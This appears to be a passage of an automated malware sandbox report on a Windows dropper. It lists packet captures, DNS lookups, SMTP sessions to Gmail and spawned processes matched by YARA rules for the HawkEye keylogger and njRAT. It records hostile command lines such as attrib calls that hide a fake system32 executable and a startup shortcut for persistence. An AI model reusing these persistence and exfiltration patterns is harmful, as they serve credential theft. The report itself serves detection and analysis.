                                                                                        Nov 18, 2021 10:14:21.032957077 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:21.092659950 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:23.764791965 CET497546542192.168.2.382.202.167.226
                                                                                        Nov 18, 2021 10:14:29.780941010 CET497546542192.168.2.382.202.167.226
                                                                                        Nov 18, 2021 10:14:32.020842075 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:43.830876112 CET497616542192.168.2.382.202.167.226
                                                                                        Nov 18, 2021 10:14:46.907335997 CET497616542192.168.2.382.202.167.226
                                                                                        Nov 18, 2021 10:14:53.001633883 CET497616542192.168.2.382.202.167.226
                                                                                        Nov 18, 2021 10:15:00.375083923 CET4979280192.168.2.3104.16.154.36
                                                                                        Nov 18, 2021 10:15:00.392447948 CET8049792104.16.154.36192.168.2.3
                                                                                        Nov 18, 2021 10:15:00.392855883 CET4979280192.168.2.3104.16.154.36
                                                                                        Nov 18, 2021 10:15:00.430659056 CET4979280192.168.2.3104.16.154.36
                                                                                        Nov 18, 2021 10:15:00.447949886 CET8049792104.16.154.36192.168.2.3
                                                                                        Nov 18, 2021 10:15:00.459104061 CET8049792104.16.154.36192.168.2.3
                                                                                        Nov 18, 2021 10:15:00.502322912 CET4979280192.168.2.3104.16.154.36
                                                                                        Nov 18, 2021 10:15:02.190361023 CET4979280192.168.2.3104.16.154.36
                                                                                        Nov 18, 2021 10:15:02.208838940 CET8049792104.16.154.36192.168.2.3
                                                                                        Nov 18, 2021 10:15:02.208991051 CET4979280192.168.2.3104.16.154.36
                                                                                        Nov 18, 2021 10:15:02.812462091 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:02.841274023 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:02.841453075 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:02.877749920 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:02.878535032 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.112066984 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.112165928 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.268135071 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.295919895 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.298783064 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.455941916 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.543004036 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.572115898 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.728338957 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.756441116 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.756470919 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.756504059 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.756522894 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.756558895 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.756622076 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.791577101 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:03.819345951 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:03.861918926 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:04.381781101 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:04.409895897 CET58749805173.194.79.108192.168.2.3
                                                                                        Nov 18, 2021 10:15:04.415887117 CET49805587192.168.2.3173.194.79.108
                                                                                        Nov 18, 2021 10:15:04.445910931 CET58749805173.194.79.108192.168.2.3

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 18, 2021 10:14:12.731645107 CET6078453192.168.2.38.8.8.8
                                                                                        Nov 18, 2021 10:14:12.751557112 CET53607848.8.8.8192.168.2.3
                                                                                        Nov 18, 2021 10:14:13.398452044 CET5114353192.168.2.38.8.8.8
                                                                                        Nov 18, 2021 10:14:13.421236038 CET53511438.8.8.8192.168.2.3
                                                                                        Nov 18, 2021 10:14:15.762671947 CET5600953192.168.2.38.8.8.8
                                                                                        Nov 18, 2021 10:14:15.791515112 CET53560098.8.8.8192.168.2.3
                                                                                        Nov 18, 2021 10:15:00.053471088 CET5072853192.168.2.38.8.8.8
                                                                                        Nov 18, 2021 10:15:00.073345900 CET53507288.8.8.8192.168.2.3
                                                                                        Nov 18, 2021 10:15:00.304965019 CET5377753192.168.2.38.8.8.8
                                                                                        Nov 18, 2021 10:15:00.328694105 CET53537778.8.8.8192.168.2.3
                                                                                        Nov 18, 2021 10:15:02.745244980 CET6035253192.168.2.38.8.8.8
                                                                                        Nov 18, 2021 10:15:02.771996975 CET53603528.8.8.8192.168.2.3
                                                                                        Nov 18, 2021 10:15:16.821176052 CET6098253192.168.2.38.8.8.8
                                                                                        Nov 18, 2021 10:15:16.849581003 CET53609828.8.8.8192.168.2.3

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                        Nov 18, 2021 10:14:12.731645107 CET192.168.2.38.8.8.80x421fStandard query (0)231.58.0.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                        Nov 18, 2021 10:14:13.398452044 CET192.168.2.38.8.8.80xb8e2Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:14:15.762671947 CET192.168.2.38.8.8.80xb79aStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:00.053471088 CET192.168.2.38.8.8.80xa891Standard query (0)231.58.0.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:00.304965019 CET192.168.2.38.8.8.80x26bcStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:02.745244980 CET192.168.2.38.8.8.80x1d23Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:16.821176052 CET192.168.2.38.8.8.80xbc52Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                        Nov 18, 2021 10:14:12.751557112 CET8.8.8.8192.168.2.30x421fName error (3)231.58.0.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                        Nov 18, 2021 10:14:13.421236038 CET8.8.8.8192.168.2.30xb8e2No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:14:13.421236038 CET8.8.8.8192.168.2.30xb8e2No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:14:15.791515112 CET8.8.8.8192.168.2.30xb79aNo error (0)smtp.gmail.com173.194.79.109A (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:00.073345900 CET8.8.8.8192.168.2.30xa891Name error (3)231.58.0.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:00.328694105 CET8.8.8.8192.168.2.30x26bcNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:00.328694105 CET8.8.8.8192.168.2.30x26bcNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:02.771996975 CET8.8.8.8192.168.2.30x1d23No error (0)smtp.gmail.com173.194.79.108A (IP address)IN (0x0001)
                                                                                        Nov 18, 2021 10:15:16.849581003 CET8.8.8.8192.168.2.30xbc52No error (0)smtp.gmail.com173.194.79.108A (IP address)IN (0x0001)

                                                                                        HTTP Request Dependency Graph

                                                                                        • whatismyipaddress.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.349752104.16.155.3680C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Nov 18, 2021 10:14:13.524677992 CET748OUTGET / HTTP/1.1
                                                                                        Host: whatismyipaddress.com
                                                                                        Connection: Keep-Alive
                                                                                        Nov 18, 2021 10:14:13.549647093 CET749INHTTP/1.1 403 Forbidden
                                                                                        Date: Thu, 18 Nov 2021 09:14:13 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 16
                                                                                        Connection: keep-alive
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Referrer-Policy: same-origin
                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                        Set-Cookie: __cf_bm=sGeod6pqVWjcwREELm2hUH2GgAdW_2GQyVQFKmuAcw0-1637226853-0-ARb8/mXyrtsjliF6MoAc1RTKm13uI/eP7YlvFz7ZWBMjq2DYNWHf6wU8P4W3in6z8BV4TXLAYgb9S5ghyt8nUT4=; path=/; expires=Thu, 18-Nov-21 09:44:13 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 6b00165a9d85690a-FRA
                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                        Data Ascii: error code: 1020


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        1192.168.2.349792104.16.154.3680
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Nov 18, 2021 10:15:00.430659056 CET1636OUTGET / HTTP/1.1
                                                                                        Host: whatismyipaddress.com
                                                                                        Connection: Keep-Alive
                                                                                        Nov 18, 2021 10:15:00.459104061 CET1637INHTTP/1.1 403 Forbidden
                                                                                        Date: Thu, 18 Nov 2021 09:15:00 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 16
                                                                                        Connection: keep-alive
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Referrer-Policy: same-origin
                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                        Set-Cookie: __cf_bm=_VxCpL1SUogQPkmhm6XJQzy_263PsYORKxhnP5Lzpu8-1637226900-0-AakJJ2rong7agBiGXb/Yc2BMeTYb8+YfO1kR1pbeDWQZeZMuafai1azbDQQgGLp6uCRe9S4dAlA9ilezE9rCYhI=; path=/; expires=Thu, 18-Nov-21 09:45:00 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 6b00177fbd724e44-FRA
                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                        Data Ascii: error code: 1020


                                                                                        SMTP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                        Nov 18, 2021 10:14:16.057013035 CET58749753173.194.79.109192.168.2.3220 smtp.gmail.com ESMTP v3sm1390611edc.69 - gsmtp
                                                                                        Nov 18, 2021 10:14:16.073266983 CET49753587192.168.2.3173.194.79.109EHLO 035347
                                                                                        Nov 18, 2021 10:14:16.104752064 CET58749753173.194.79.109192.168.2.3250-smtp.gmail.com at your service, [84.17.52.63]
                                                                                        250-SIZE 35882577
                                                                                        250-8BITMIME
                                                                                        250-STARTTLS
                                                                                        250-ENHANCEDSTATUSCODES
                                                                                        250-PIPELINING
                                                                                        250-CHUNKING
                                                                                        250 SMTPUTF8
                                                                                        Nov 18, 2021 10:14:16.153516054 CET49753587192.168.2.3173.194.79.109STARTTLS
                                                                                        Nov 18, 2021 10:14:16.181858063 CET58749753173.194.79.109192.168.2.3220 2.0.0 Ready to start TLS
                                                                                        Nov 18, 2021 10:15:02.877749920 CET58749805173.194.79.108192.168.2.3220 smtp.gmail.com ESMTP dm5sm751309ejc.81 - gsmtp
                                                                                        Nov 18, 2021 10:15:02.878535032 CET49805587192.168.2.3173.194.79.108EHLO 035347
                                                                                        Nov 18, 2021 10:15:03.112066984 CET58749805173.194.79.108192.168.2.3220 smtp.gmail.com ESMTP dm5sm751309ejc.81 - gsmtp
                                                                                        Nov 18, 2021 10:15:03.268135071 CET49805587192.168.2.3173.194.79.108EHLO 035347
                                                                                        Nov 18, 2021 10:15:03.298783064 CET58749805173.194.79.108192.168.2.3250-smtp.gmail.com at your service, [84.17.52.63]
                                                                                        250-SIZE 35882577
                                                                                        250-8BITMIME
                                                                                        250-STARTTLS
                                                                                        250-ENHANCEDSTATUSCODES
                                                                                        250-PIPELINING
                                                                                        250-CHUNKING
                                                                                        250 SMTPUTF8
                                                                                        Nov 18, 2021 10:15:03.543004036 CET49805587192.168.2.3173.194.79.108STARTTLS
                                                                                        Nov 18, 2021 10:15:03.572115898 CET58749805173.194.79.108192.168.2.3220 2.0.0 Ready to start TLS
                                                                                        Nov 18, 2021 10:15:16.926930904 CET58749808173.194.79.108192.168.2.3220 smtp.gmail.com ESMTP r25sm642291edt.21 - gsmtp

                                                                                        Code Manipulations

                                                                                        Statistics

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Start time:10:13:43
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\Desktop\Hpdyv8oO3j.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Hpdyv8oO3j.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1634464 bytes
                                                                                        MD5 hash:DFFAF08A25150B38C19210C180862AEB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:10:13:49
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\Keylogger.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Keylogger.exe"
                                                                                        Imagebase:0x760000
                                                                                        File size:533504 bytes
                                                                                        MD5 hash:C4E4A84909D8FF8DD222B8252365985D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Arnim Rupp
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:10:13:50
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\hhzclipper.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\hhzclipper.exe"
                                                                                        Imagebase:0x1e0000
                                                                                        File size:6144 bytes
                                                                                        MD5 hash:FC07BE5E90A1FFA22B22D3BC58A43E58
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:10:13:50
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                                                                                        Imagebase:0x550000
                                                                                        File size:77824 bytes
                                                                                        MD5 hash:098F7F40BACA320377ECA83FBF87F534
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 89%, ReversingLabs
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:10:13:51
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                                                                                        Imagebase:0x340000
                                                                                        File size:77824 bytes
                                                                                        MD5 hash:098F7F40BACA320377ECA83FBF87F534
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:10:13:52
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HOST.bat" "
                                                                                        Imagebase:0xd80000
                                                                                        File size:232960 bytes
                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:10:13:52
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7f20f0000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:10:13:52
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\ViRuS.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\ViRuS.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:46132 bytes
                                                                                        MD5 hash:D0F09063EA6922ACBFC734145FA48203
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Visual Basic
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 83%, Metadefender, Browse
                                                                                        • Detection: 93%, ReversingLabs
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:10:13:54
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\SysWOW64\attrib.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe
                                                                                        Imagebase:0xf90000
                                                                                        File size:19456 bytes
                                                                                        MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:10:13:54
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7f20f0000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:10:13:55
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\SysWOW64\attrib.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
                                                                                        Imagebase:0xf90000
                                                                                        File size:19456 bytes
                                                                                        MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:10:13:55
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7f20f0000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:10:13:55
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:taskkill /f /im "ViRuS.exe"
                                                                                        Imagebase:0xee0000
                                                                                        File size:74752 bytes
                                                                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:10:13:56
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7f20f0000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:10:14:02
                                                                                        Start date:18/11/2021
                                                                                        Path:C:\Users\user\AppData\Roaming\RedLine.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\RedLine.exe"
                                                                                        Imagebase:0x580000
                                                                                        File size:77824 bytes
                                                                                        MD5 hash:098F7F40BACA320377ECA83FBF87F534
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
